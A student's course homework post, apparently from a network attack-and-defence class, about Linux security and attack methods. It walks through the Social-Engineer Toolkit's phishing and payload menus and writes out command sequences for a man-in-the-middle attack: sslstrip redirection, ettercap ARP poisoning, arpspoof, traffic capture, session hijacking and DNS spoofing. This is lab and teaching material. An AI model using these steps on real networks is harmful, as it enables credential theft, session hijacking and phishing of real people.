标签:pac 渗透测试 用法 受害人 统一 bubuko proc alt ssl
1)** Linux的优势**
开放源代码与免费
跨平台的硬件支持
丰富的软件支持
多用户多任务
可靠的安全性
良好的稳定性
完善的网络功能
2)** Linux系统结构**
Linux系统结构包括Linux内核,一些GNU运行库和工具,命令行Shell,图形界面X窗口系统及相应桌面环境。在硬件抽象层之上是内核服务功能模块,包括进程管理、内存管理、文件系统、设备控制与网络这五个子系统;而这些内核模块通过系统调用接口向用户态的GNU运行库及工具、命令行Shell、X窗口以及应用软件提供服务。
1) Linux身份认证机制
2) Linux授权与访问控制机制
文件的访问权限
R---读取
W---写入
X---执行
Linux访问机制的不足及改进
3) Linux安全审计机制
连接时间日志
进程控制日志
错误日志记录
远程网络上侵入Linux系统的主要方法
口令进行猜测攻击
安全漏洞利用
安装和执行恶意程序
Linux远程口令字猜测攻击
口令猜测工具:
Brutus:最快、最灵活的远程口令猜测破解工具
THC Hydra:快速的网络身份认证口令猜测工具
Cain and Abel
攻击Linux路由器和监听器
1)Linux本地特权提升
特权提升途径:
linux用户口令字破解
利用sudo的缺陷进行特权提升
利用用户态SUID程序漏洞进行特权提升
针对SUID程序的本地缓冲区溢出攻击
针对SUID程序的符号链接攻击
针对SUID程序的竞争条件攻击
针对SUID程序的共享函数库攻击
利用内核空间代码漏洞进行特权提升
利用系统配置不当实施本地特权提升
2) Linux系统上的消踪灭迹
3) Linux系统远程控制后门程序
Social Enginnering Toolkit(SET)是一个开源、Python驱动的社会工程学渗透测试工具,提供了非常丰富的攻击向量库。是开源的社会工程学套件,通常结合metasploit来使用。
问题:没有此软件,输入命令setoolkit显示未找到命令
解决:1)使用命令git clone https://github.com/trustedsec/social-engineer-toolkit/
进行下载
2)命令ls
3)进入social-engineer-toolkit ,命令为cd social-engineer-toolkit
根据readme 进行操作,依次输入下面的命令
使用命令setoolkit
进入
菜单选项
1 是社会工程学攻击
2 是Fast-Track渗透测试
3 是第三方模块
输入1回车
出现11个模块
1.鱼叉式钓鱼攻击
2.网站攻击
3.介质感染攻击
4.创建Payload并监听
5.群发邮件攻击
6.基于Arduino的攻击
7.短信欺骗攻击
8.无线接入点攻击
9.二维码攻击
10.powershell攻击
11.第三方模块
继续上面的步骤,输入1回车
此攻击向量主要目的为发送存在恶意软件的钓鱼邮件,相应的payload可以选择不同的漏洞,输入2 回车
此时开放一个webServer服务,如果对方访问此页面,若系统存在漏洞触发条件,则会被植入后门。如Java Applet Attack 方法就需要目标有Java运行环境。为了仿真,可以选择自建模版或克隆一个网站。
同时提供一个功能可以复制一个网站,先输入1回车,再输入2 回车
借助Autorun.inf执行Exploit得到一个返回的shell,也可以结合Metasploit的后门
与Metasploit给出的Payload类似,创建一个后门发给对方
输入5回车,支持导入列表并向列表中的每个人发送邮件
无线接入点攻击会创建一个虚拟无线AP,通过接入点ap可以抓取所有连接进来的设备流量。
填入一个危险的URL,使得被攻击者扫描二维码自动访问页面而中招
针对vista以上的攻击模块。
(1) 为Kali设置开启端口转发
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
修改为1
(2)设置ssltrip
为了劫持SSL数据,需要https数据变为http:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081
让sslstrip在8081端口监听,需要使https数据变为http,让sslrtrip在8081端口监:
sslstrip -l 8081
(3)ettercap的准备
ettercap是一套用于中间人攻击的工具。和dsniff套件齐名。支持插件和过滤脚本,直接将账号、密码显示出来,不用人工提取数据。如果是第一次中间人攻击操作,那么要对kali下的etteracp做点配置。
然后使用ettercap中间人攻击工具,使用前我们修改一下配置文件:
配置文件是/etc/ettercap/etter.conf,首先要将ec_uid、ec_gid都变为0
将下面Linux分类下的if you use iptables这一行,将注释去掉,保存退出
将注释去掉打开图形界面时说出错,不注释掉就可以打开
打开图形化界面 ettercap -G,选择嗅探网卡 默认eth0
在sniff下选择unified sniffing,默认使用eth0嗅探网卡
在host下选择scan for hosts扫描内网信息
完毕后打开host list
将网关add to target 1 ,想攻击的目标add to target 2,mitm选项卡ARPpoisoning
然后start sniffing
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
tcpdump -i wlan -w test.cap
forret -r test.cap
hamster hamster
dnsspoof -i wlan0 -f /root/hosts
2017-2018-2 20179225 《网络攻防与实践》 第8周作业
标签:pac 渗透测试 用法 受害人 统一 bubuko proc alt ssl
原文地址:https://www.cnblogs.com/2017yaya/p/8962513.html